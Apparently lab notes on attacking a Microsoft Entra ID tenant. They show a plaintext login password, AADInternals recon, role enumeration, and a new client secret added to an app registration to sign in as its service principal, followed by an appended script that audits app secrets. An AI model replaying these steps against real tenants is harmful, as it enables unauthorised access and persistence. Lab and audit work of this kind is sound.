Starting point
password = "QTYQedP$2$o2OnH5"
username = "[email protected]"
The user exists
<https://login.microsoftonline.com/[email protected]&xml=1>
<RealmInfo Success="true">
<State>4</State>
<UserState>1</UserState>
<Login>[email protected]</Login>
<NameSpaceType>Managed</NameSpaceType>
<DomainName>nigeraldcorp.onmicrosoft.com</DomainName>
<IsFederatedNS>false</IsFederatedNS>
<FederationBrandName>Nigerald Corp</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName>
<CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri>
</RealmInfo>
AADInternals
import-module .\AADInternals\AADInternals.psd1
PS C:\Users\Dylan\Desktop\tools> Invoke-AADIntReconAsOutsider -domainname nigeraldcorp.onmicrosoft.com
Tenant brand: Nigerald Corp
Tenant name: nigeraldcorp.onmicrosoft.com
Tenant id: 5639a4aa-e0d0-4225-abe7-84d168892466
Tenant region: NA
DesktopSSO enabled: False
Name : nigeraldcorp.onmicrosoft.com
DNS : False
MX : False
SPF : False
DMARC :
DKIM : False
MTA-STS : False
Type : Managed
STS :
PS C:\Users\Dylan\Desktop\tools> connect-azuread
Account Environment TenantId TenantDomain AccountType
------- ----------- -------- ------------ -----------
[email protected] AzureCloud 5639a4aa-e0d0-4225-abe7-84d168892466 nigeraldcorp.onmicrosoft.com User
PS C:\Users\Dylan\Desktop\tools> Get-AzureADCurrentSessionInfo
Account Environment TenantId TenantDomain AccountType
------- ----------- -------- ------------ -----------
[email protected] AzureCloud 5639a4aa-e0d0-4225-abe7-84d168892466 nigeraldcorp.onmicrosoft.com User
PS C:\Users\Dylan\Desktop\tools> get-azureadtenantdetail
ObjectId DisplayName VerifiedDomain
-------- ----------- --------------
5639a4aa-e0d0-4225-abe7-84d168892466 Nigerald Corp nigeraldcorp.onmicrosoft.com
PS C:\Users\Dylan\Desktop\tools> Get-AzureADDirectoryRole
ObjectId DisplayName Description
-------- ----------- -----------
0e03b64a-588c-4837-b303-f41d6de28be8 Application Administrator Can create and manage all aspects of app registrations and enterprise apps.
61e6e457-e0b0-4a97-8cc2-7db3a4ff5ad8 Global Administrator Can manage all aspects of Microsoft Entra ID and Microsoft services that use Microsoft Entra identities.
PS C:\Users\Dylan\Desktop\tools> Get-AzureADDirectoryRoleMember -objectid 0e03b64a-588c-4837-b303-f41d6de28be8
ObjectId DisplayName UserPrincipalName UserType
-------- ----------- ----------------- --------
487b7998-64f1-4f8e-9e1e-dcb27e39c8f0 chris.green [email protected] Member
A loop to do things better
# Get-AzureADDirectoryRole only returns roles that have been activated in the tenant,
# which is why just two roles show up here
$roles = Get-AzureADDirectoryRole
ForEach($role in $roles){
    # tag each member with the role it came from so the combined list stays readable
    Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId | select @{n="Azure role";e={$role.DisplayName}}, displayname
}
Azure role DisplayName
---------- -----------
Application Administrator chris.green
Global Administrator Dylan Tran
PS C:\Users\Dylan\Desktop\tools> Get-AzureADApplication
ObjectId AppId DisplayName
-------- ----- -----------
b0583e65-6412-4f63-a433-d84174cb5e01 ad61a599-93cc-44e8-9f00-8a915635ee2a NigeraldCorp-App
PS C:\Users\Dylan\Desktop\tools> new-azureadapplicationpasswordcredential -objectid b0583e65-6412-4f63-a433-d84174cb5e01
CustomKeyIdentifier :
EndDate : 12/21/2024 6:28:22 PM
KeyId :
StartDate : 12/21/2023 6:28:22 PM
Value : 4mlV5RAnaQXrA6acNRlEa2b/O7Yfk6iJ5syRdaYCMoU=
PS C:\Users\Dylan\Desktop\tools> $pass = convertto-securestring -asplaintext -force '4mlV5RAnaQXrA6acNRlEa2b/O7Yfk6iJ5syRdaYCMoU='
PS C:\Users\Dylan\Desktop\tools> $creds = new-object -typename system.management.automation.pscredential -argumentlist ad61a599-93cc-44e8-9f00-8a915635ee2a, $pass
PS C:\Users\Dylan\Desktop\tools> connect-azaccount -serviceprincipal -credential $creds -tenant 5639a4aa-e0d0-4225-abe7-84d168892466
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
ad61a599-93cc-44e8-9f00-8a915635ee2a Azure subscription 1 5639a4aa-e0d0-4225-abe7-84d168892466 AzureCloud
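Added audit check, not part of these notes: the same AzureAD module can list every password credential on every app registration together with the app's owners, so a secret added the way shown above (new StartDate, no matching change request) stands out. It assumes an existing Connect-AzureAD session with read access to applications; $RecentDays is an assumed parameter.

```powershell
# Audit example (added here, not from the original notes): enumerate all app registration
# password credentials and flag those created within the last $RecentDays days.
# Assumes Connect-AzureAD has already been run with application read permissions.
param([int]$RecentDays = 7)

$cutoff = (Get-Date).AddDays(-$RecentDays)

$rows = foreach ($app in Get-AzureADApplication -All $true) {
    # owners are the identities most likely to have added a legitimate secret
    $owners = (Get-AzureADApplicationOwner -ObjectId $app.ObjectId |
        ForEach-Object { $_.DisplayName }) -join ', '

    foreach ($cred in Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId) {
        [pscustomobject]@{
            App       = $app.DisplayName
            AppId     = $app.AppId
            KeyId     = $cred.KeyId
            StartDate = $cred.StartDate
            EndDate   = $cred.EndDate
            Owners    = $owners
            # a secret newer than the cutoff should be matched against the audit log
            Recent    = ($cred.StartDate -gt $cutoff)
        }
    }
}

# newest secrets first; anything marked Recent=True needs an explanation
$rows | Sort-Object StartDate -Descending | Format-Table -AutoSize
```

Run it periodically and compare against the "Update application – Certificates and secrets management" entries in the Entra audit log to confirm who added each flagged credential.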